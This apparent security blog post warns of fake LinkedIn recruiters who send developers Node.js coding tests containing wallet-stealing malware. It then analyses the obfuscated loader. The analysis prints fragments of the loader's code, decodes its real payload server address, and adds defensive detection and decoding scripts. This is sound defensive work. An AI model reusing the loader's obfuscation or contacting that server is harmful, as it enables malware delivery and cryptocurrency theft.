Beware of LinkedIn Scammers Impersonating Recruiters to Steal Cryptocurrency Wallet Private Keys
Introduction
The rise of cryptocurrency has brought about incredible opportunities, but it has also attracted malicious actors looking to exploit unsuspecting individuals. A concerning trend has emerged where scammers impersonate recruiters on LinkedIn to deceive applicants and steal their cryptocurrency wallet private keys. This blog post outlines the process these attackers use to carry out their schemes and provides guidance on how to protect yourself.
The Scam Process
1. Attackers Pose as Recruiters on LinkedIn
Scammers create fake LinkedIn profiles, masquerading as recruiters from reputable companies in the tech or cryptocurrency sectors. They often use:
Professional-looking profiles with company logos and industry jargon.
Stolen or AI-generated profile pictures to appear legitimate.
Fabricated work histories that include well-known companies.
Their goal is to establish credibility and lure in professionals seeking new opportunities.
2. Attackers Request Completion of a Coding Test
Once contact is made, the fake recruiter expresses interest in your background and skills. They invite you to participate in a technical assessment or coding test as part of the hiring process. This seems like a standard procedure, which lowers your guard.
3. The Malicious Node.js Project
The coding test provided is a Node.js project that appears normal at first glance. However, hidden within the code is a compressed or obfuscated JavaScript script designed to:
Scan your computer for files related to cryptocurrency wallets.
Extract private keys and sensitive information from wallet files.
Silently upload the stolen data to the attacker's server.
Because the malicious code is embedded and concealed, even developers may overlook it during a casual review.
4. Attackers Drain Cryptocurrency Assets
With access to your private keys, the attackers can:
Gain full control of your cryptocurrency wallets.
Transfer out all tokens and coins without your authorization.
Use cross-chain techniques to move assets across different blockchains, making the transactions harder to trace and reverse.
Victims often discover the theft too late, with little recourse to recover their lost assets.
How to Protect Yourself
Verify Recruiter Authenticity
Check Profiles Thoroughly: Look for inconsistencies in their employment history, connections, and endorsements.
Contact Companies Directly: Reach out to the company’s HR department to confirm the recruiter's identity.
Be Wary of Immediate Offers: Legitimate recruiters typically have a formal process and won't rush you.
Exercise Caution with Coding Tests
Analyze the Code: Before running any code, review it carefully for suspicious scripts or dependencies.
Use Sandbox Environments: Run unfamiliar code in a virtual machine or secure sandbox to prevent potential harm to your system.
Question Unusual Requests: Be skeptical if the test requires elevated permissions or accesses files unrelated to the task.
Protect Your Cryptocurrency Wallets
Secure Storage: Keep private keys in encrypted wallets or hardware devices, not in plain text files.
Separate Work and Personal Data: Avoid storing personal cryptocurrency information on devices used for testing or development.
Regular Backups: Maintain up-to-date backups of your wallets in secure locations.
Stay Informed and Vigilant
Educate Yourself: Stay updated on common scams and attack vectors in the cryptocurrency space.
Use Security Software: Install reputable antivirus and anti-malware tools to detect and prevent malicious activities.
Trust Your Instincts: If something feels off, don't proceed without further verification.
Conclusion
The ingenuity of scammers continues to evolve alongside technology. By understanding their methods, you can better defend against their tactics. Remember that legitimate recruiters will respect your security and privacy—they will never require you to compromise your personal information or run suspicious code.
Stay cautious, protect your assets, and share this information to help others avoid falling victim to these scams.
If you have experienced or observed similar scams, consider reporting them to LinkedIn and relevant authorities to aid in the fight against cybercrime.
This code is a highly obfuscated JavaScript script whose primary function is to download an executable file or script from a remote server and execute it on the victim's computer. Here's a detailed analysis of the code:
Code Obfuscation and Self-Protection:
The code uses numerous meaningless variable names and functions, such as E(a,b), aO, ax, etc.
It employs function redefinitions and loops to confuse the code logic, making it difficult to read and understand directly.
It hides the real strings inside encoded or computed values, reconstructing them at runtime through numeric and string manipulation.
Dynamic Decoding and Module Loading:
The code uses Buffer.from() and toString() methods to decode encoded strings, such as decoding Base64-encoded strings into readable module names or file paths.
It dynamically loads Node.js core modules like fs (File System), os (Operating System information), path (Path handling), etc.
Collecting System Information:
It retrieves the victim's home directory, hostname, platform type, and user information.
It constructs an HTTP request containing the collected system information and sends it to the attacker's server.
Downloading and Executing Malicious Code:
It constructs a download link to obtain malicious code from a remote server:
const a0 = () => {
let ax = 'MTQ3LjEyNCaHR0cDovLw4yMTQuMTI5OjEyNDQ= ';
// String manipulation and decoding to get the URL
return Q(az) + Q(ay);
};
The code saves the downloaded content to the victim's file system, typically in a hidden folder within the home directory.
It uses the child_process module to execute the downloaded code, which could be a reverse shell or another malicious payload.
Scheduled Tasks and Persistence:
The code sets up a timer using setInterval to periodically execute its main malicious functions, ensuring ongoing malicious activity:
let aw = setInterval(() => {
(au += 1) < 3 ? av() : clearInterval(aw);
}, 0x927c0); // Interval time is 0x927c0 (600,000 milliseconds, i.e., 10 minutes)
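The "Analyze the Code" advice above and the indicators listed in this analysis (runtime Base64 decoding, child_process, a hidden folder under the home directory, a long setInterval period) can be turned into a static triage pass a candidate runs over a coding-test repository before executing it. This is an added example, not code from the post; the rules, the 60-second interval threshold and the sample project are my own constructions.

```javascript
// Added example, not code from the post: a static triage pass to run over a
// "coding test" repository before executing it. Each rule is one indicator
// from the analysis above; the 60 s interval threshold is my assumption.
const RULES = [
  { id: 'base64-decode', re: /Buffer\.from\([^)]*['"]base64['"]\s*\)/,
    why: 'decodes strings at runtime (hidden module names, paths, URLs)' },
  { id: 'child_process', re: /require\(\s*['"]child_process['"]\s*\)/,
    why: 'can execute a downloaded payload' },
  { id: 'homedir-hidden', re: /homedir\(\)[^;\n]*['"]\.[A-Za-z0-9_-]+/,
    why: 'builds a path to a hidden folder under the home directory' },
  { id: 'raw-ip-url', re: /https?:\/\/\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?/,
    why: 'contacts a bare IP address rather than a hostname' },
  { id: 'opaque-literal', re: /['"][A-Za-z0-9+/=]{32,}\s*['"]/,
    why: 'long Base64-looking literal, typical of packed loaders' },
];
// A long setInterval period is the persistence/beacon shape (the sample uses
// 0x927c0 ms = 10 minutes). Returns the period in ms when >= 60000, else null.
function longIntervalMs(source) {
  const m = source.match(/setInterval\([\s\S]*?,\s*(0x[0-9a-fA-F]+|\d+)\s*\)/);
  return m && Number(m[1]) >= 60000 ? Number(m[1]) : null;
}
function triageSource(file, source) {
  const findings = RULES.filter(r => r.re.test(source)).map(r =>
    ({ file, id: r.id, evidence: source.match(r.re)[0].slice(0, 60), why: r.why }));
  const ms = longIntervalMs(source);
  if (ms) findings.push({ file, id: 'long-interval', evidence: `setInterval ${ms} ms`,
    why: 'periodic re-execution (persistence)' });
  return findings;
}
// files: { relativePath: sourceText }. Runtime decoding combined with process
// execution or a raw-IP URL is the staged-loader pattern described above.
function triageProject(files) {
  const findings = Object.entries(files).flatMap(([f, s]) => triageSource(f, s));
  const ids = new Set(findings.map(f => f.id));
  const loader = ids.has('base64-decode') && (ids.has('child_process') || ids.has('raw-ip-url'));
  return { findings, verdict: loader ? 'DO NOT RUN' : findings.length ? 'REVIEW' : 'CLEAN' };
}
// Constructed sample project: an ordinary app file plus a "helper" carrying the
// indicators. It is inert: nothing here downloads or executes anything.
const SAMPLE = {
  'src/app.js': "const express = require('express');\nmodule.exports = (a, b) => a + b;\n",
  'test/helper.js': [
    "const cp = require('child_process');",
    "const Q = s => Buffer.from(s, 'base64').toString();",
    "let ax = 'MTQ3LjEyNCaHR0cDovLw4yMTQuMTI5OjEyNDQ= ';",
    "const dir = require('path').join(require('os').homedir(), '.hidden-cache');",
    "let au = 0, aw = setInterval(() => { (au += 1) < 3 ? av() : clearInterval(aw); }, 0x927c0);",
  ].join('\n'),
};
```

Run `triageProject` over the real files of a repository (read with `fs`) and treat a DO NOT RUN verdict as a reason to stop and inspect the flagged lines in an isolated VM; the rules are heuristics and will also flag some legitimate tooling, so REVIEW means read, not reject.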
Summary:
The primary purpose of this code is to download and execute remote malicious code on the victim's computer, potentially for:
Establishing a reverse shell to give the attacker remote control over the victim's system.
Installing other malware such as keyloggers, cryptocurrency miners, etc.
Collecting and sending the victim's system information, possibly for further attacks or intelligence gathering.
Recommendations:
Do not execute this code on a production system or a personal computer, to avoid malware infection.
Use antivirus software and firewalls to prevent the execution of such malicious code and network communication.
Regularly update systems and software to patch known security vulnerabilities.
Educate users not to execute scripts and programs from unknown or suspicious sources.
Analysis of the Download URL:
The code constructs a download URL in a highly obfuscated manner. Here's the step-by-step analysis:
Locating the Function that Builds the Download URL:
const a0 = () => {
let ax = 'MTQ3LjEyNCaHR0cDovLw4yMTQuMTI5OjEyNDQ= ';
for (var ay = '', az = '', aA = '', aB = '', aC = 0x0; aC < 0xa; aC++) {
ay += ax[aC];
az += ax[0xa + aC];
aA += ax[0x14 + aC];
aB += ax[0x1e + aC];
}
return (ay = ay + aA + aB), Q(az) + Q(ay);
};
The code constructs the download URL http://147.124.214.129:1244 by decoding obfuscated Base64 strings.
This URL likely points to a malicious server intended to deliver and execute harmful code on the victim's machine.
Parsing the String Segments:
The loop splits ax = 'MTQ3LjEyNCaHR0cDovLw4yMTQuMTI5OjEyNDQ= ' into four 10-character pieces:
ay: takes 10 characters starting from ax[0].
az: takes 10 characters starting from ax[10].
aA: takes 10 characters starting from ax[20].
aB: takes 10 characters starting from ax[30].
After the loop, ay = ay + aA + aB; ay and az are then passed to the function Q for decoding.
Function Q and Decoding:
az = 'aHR0cDovLw'; // Base64 encoded string
ay = 'MTQ3LjEyNC4yMTQuMTI5OjEyNDQ='; // Base64 encoded string (note the padding '=')
Q(az) decodes to 'http://'.
Q(ay) decodes to '147.124.214.129:1244'.
Constructing the Download URL:
Q(az) + Q(ay) yields http://147.124.214.129:1244, so the code constructs the download URL by decoding obfuscated Base64 strings.
Recommendations:
Do not visit the above URL to avoid downloading and executing malicious code, which could lead to security risks.
If you find similar code on your system, it is advisable to conduct a security audit and use professional antivirus software to clean your system.
Be vigilant about suspicious scripts and programs, and avoid running code from unknown sources.
Please Note: Interacting with or analyzing malicious code should be done with caution and preferably within a secure, isolated environment (like a virtual machine) to prevent unintended consequences.
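The download URL can be recovered statically, without ever executing the sample, by re-implementing the slicing and decoding steps analysed above. This is an added example, not code from the post or the malware; it assumes Q is plain Base64 decoding (as the analysis states) and embeds the obfuscated literal from the sample as its input.

```javascript
// Added example, not code from the post: a static re-implementation of the
// obfuscated a0() routine so the indicator can be recovered for blocking and
// hunting without running the sample. Q is assumed to be plain Base64 decoding,
// as the step-by-step analysis above states.
const OBFUSCATED = 'MTQ3LjEyNCaHR0cDovLw4yMTQuMTI5OjEyNDQ= '; // literal from the sample

// Lenient Base64 decode: the literal carries trailing whitespace and the
// original loop reads past the end of the string, so strip anything that
// is not a Base64 symbol before decoding.
function Q(s) {
  return Buffer.from(s.replace(/[^A-Za-z0-9+/=]/g, ''), 'base64').toString('utf8');
}

// The loop in a0() fills four 10-character windows: ay=ax[0..9], az=ax[10..19],
// aA=ax[20..29], aB=ax[30..39]. slice() keeps a short string from yielding
// "undefined" fragments the way the original index loop would.
function splitWindows(ax, width = 10) {
  const win = i => ax.slice(i * width, (i + 1) * width);
  return { ay: win(0), az: win(1), aA: win(2), aB: win(3) };
}

// ay + aA + aB carries host:port, az carries the scheme; a0() returns Q(az) + Q(ay).
function recoverUrl(ax) {
  const { ay, az, aA, aB } = splitWindows(ax);
  const scheme = Q(az), hostport = Q(ay + aA + aB);
  return { scheme, hostport, url: scheme + hostport };
}

// Hunt helper: try every literal of the right shape in a source file, so the
// decoder still works when the constant has been renamed or moved.
function huntInterleavedLiterals(source) {
  const hits = [];
  for (const m of source.matchAll(/['"]([A-Za-z0-9+/=\s]{36,})['"]/g)) {
    const { url } = recoverUrl(m[1]);
    if (/^https?:\/\/\S+$/.test(url)) hits.push(url);
  }
  return hits;
}

console.log(recoverUrl(OBFUSCATED)); // url: http://147.124.214.129:1244
```

The recovered host and port are what go into a firewall block list or a proxy-log search; the sample itself never needs to be run to obtain them.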